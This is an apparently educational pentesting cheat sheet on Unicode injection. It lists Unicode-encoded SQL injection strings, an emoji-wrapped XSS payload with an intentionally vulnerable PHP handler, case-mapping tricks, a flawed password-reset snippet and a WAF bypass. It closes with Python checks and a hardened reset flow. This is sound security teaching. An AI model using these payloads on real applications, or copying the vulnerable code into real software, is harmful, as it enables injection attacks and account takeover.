# Unicode Injection & Weaponising:

{% hint style="info" %}
Unicode Weaponising: <https://medium.com/csg-govtech/weaponizing-unicode-for-fun-and-profit-e2ce24d594c6>

Unicode Injection:  <https://book.hacktricks.xyz/pentesting-web/unicode-injection>

Unicode normalization: <https://book.hacktricks.xyz/pentesting-web/unicode-injection/unicode-normalization>
{% endhint %}

## Use of Unicode:

1. Punycode attacks: ("аpple.com" is encoded as "xn--pple-43d.com", because its "а" is a Cyrillic Unicode look-alike of the Latin "a"; "e" has a Cyrillic twin as well.)
2. Case Mapping Collisions: (when the uppercase and lowercase forms of a character do not have the same length.)
3. XSS
4. Filter bypass

## Unicode Normalization:

Unicode normalization becomes exploitable when **Unicode characters are normalized to ASCII characters** after the input has already been filtered or validated.

### Testing:

**KELVIN SIGN (U+212A)** (`%e2%84%aa`) **normalises to "K"**.

`%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` becomes `Leonishan` after **Unicode** normalization.

### Some useful character:

```
o -- %e1%b4%bc
r -- %e1%b4%bf
1 -- %c2%b9
= -- %e2%81%bc
/ -- %ef%bc%8f
- -- %ef%b9%a3
# -- %ef%b9%9f
* -- %ef%b9%a1
' -- %ef%bc%87
" -- %ef%bc%82
| -- %ef%bd%9c
```

```
' or 1=1-- -
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

" or 1=1-- -
%ef%bc%82+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

' || 1==1//
%ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f

" || 1==1//
%ef%bc%82+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
```

<figure><img src="/files/ZV7DCF6vTkHYiEAcSkLR" alt=""><figcaption><p>Used for XSS if the application is vulnerable to Unicode normalization.</p></figcaption></figure>

### `\u` to `%`:

If the backend rewrites the Unicode escape prefix **`\u` into `%`, the result may be usable for XSS.**

**For example,** take the character `㱋` (`\u3c4b`). If a backend **transforms** the prefix **`\u` into `%`**, the resulting string is `%3c4b`, which URL-decodes to **`<4b`**. So a **`<` character is injected**.

## Emoji Injection:

{% hint style="info" %}
Emoji list:

<https://unicode.org/emoji/charts-14.0/full-emoji-list.html>

<https://github.com/iorch/jakaton_feminicidios/blob/master/data/emojis.csv>
{% endhint %}

### Payload:

```
💋img src=x onerror=alert(document.domain)//💛
```

Code:

```php
<?php
// Vulnerable handler: htmlspecialchars() runs on the raw input, which contains no "<" or ">".
$str = isset($_GET["str"]) ? htmlspecialchars($_GET["str"]) : "";

// The UTF-8 bytes are then re-read as Windows-1252: the last byte of 💋 (0x8B) becomes
// "‹" (U+2039) and the last byte of 💛 (0x9B) becomes "›" (U+203A) ...
$str = iconv("Windows-1252", "UTF-8", $str);
// ... which ASCII//TRANSLIT renders as "<" and ">", after the escaping has already happened.
$str = iconv("UTF-8", "ASCII//TRANSLIT", $str);

echo "String: " . $str;
```

## Case Mapping Collisions:

It happens when the uppercase and lowercase forms of a character do not have the same length.

Example:

```javascript
// "ß" (U+00DF) has no single-character uppercase form: it maps to "SS"
"ß".toUpperCase() == "SS" //true
"ß".toUpperCase().length == 2 //true
```

```javascript
// "İ" (U+0130, URL encoded %C4%B0) lowercases to "i" followed by U+0307 COMBINING DOT ABOVE,
// so every occurrence doubles in length
> 'İ'.repeat(32).length
32
> 'İ'.repeat(32).toLowerCase().length
64
```

**Tool for Case Mapping Collisions:** <https://spaceraccoon.github.io/unicollider/>

## Example Attack:

1. Password reset flow:

```java
// The lookup lowercases the input (a look-alike such as U+212A KELVIN SIGN becomes "k"),
// but the token is mailed to the raw, un-normalised input, i.e. to a different address.
User resetUser = database.findUserWithEmail(attackerInput.toLowerCase());
if (resetUser != null) sendResetEmail(resetUser.resetToken(), attackerInput);
```

2. XSS:

```javascript
// "ſ" (U+017F) uppercases to "S" and "ı" (U+0131) to "I", so JAVAſCRıPT: becomes JAVASCRIPT:
document.location = getQueryParam('redirect').toUpperCase();    // JAVAſCRıPT
```

If a WAF blocks `javascript:alert()`, `JAVAſCRıPT` may still work, because the `toUpperCase()` call turns it into `JAVASCRIPT` only after the filter has run.
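As an added example (not code from this page or from the linked write-ups), the checks a defender would run to reproduce the normalization and case-mapping behaviour above: decode the page's encoded strings, see what NFKC normalization and case mapping turn them into, and compare the reset flow from the example attack with a hardened variant. The deny-list, the `kite.example` address and the reject-if-not-canonical policy are assumptions.

```python
import unicodedata
from urllib.parse import unquote, unquote_plus

# Constructed inputs, decoded from the percent-encoded strings shown on this page.
KELVIN = unquote("%e2%84%aa")  # U+212A KELVIN SIGN
MATH_NAME = unquote("%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88"
                    "%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83")
SQLI = unquote_plus("%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3")

# Hypothetical deny-list of a naive filter that inspects the raw request only.
FORBIDDEN = set("'\"<>|#*/=-")


def nfkc(s: str) -> str:
    """The normalization a backend or database may apply after the filter has run."""
    return unicodedata.normalize("NFKC", s)


def introduced_by_normalization(raw: str) -> set:
    """Forbidden characters absent from the raw input but present after NFKC.
    A non-empty result means a filter that only sees the raw input is bypassed."""
    return (set(nfkc(raw)) - set(raw)) & FORBIDDEN


def case_mapping_collision(s: str) -> bool:
    """True when upper- or lower-casing changes the length (ß -> SS, İ -> i + U+0307)."""
    return len(s.upper()) != len(s) or len(s.lower()) != len(s)


def vulnerable_reset_target(users: dict, attacker_input: str):
    """The page's reset flow: lookup on the lowercased input, mail sent to the raw input."""
    return attacker_input if attacker_input.lower() in users else None


def hardened_reset_target(users: dict, attacker_input: str):
    """Hardened flow (assumed policy): refuse input that NFKC would change or that is not
    ASCII, canonicalize once, and send the token only to the canonical address that matched."""
    canon = nfkc(attacker_input)
    if canon != attacker_input or not canon.isascii():
        return None
    canon = canon.lower()
    return canon if canon in users else None
```

With a look-alike address such as `victim@<KELVIN SIGN>ite.example`, the vulnerable flow mails the token to the look-alike domain while the hardened flow refuses the input.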
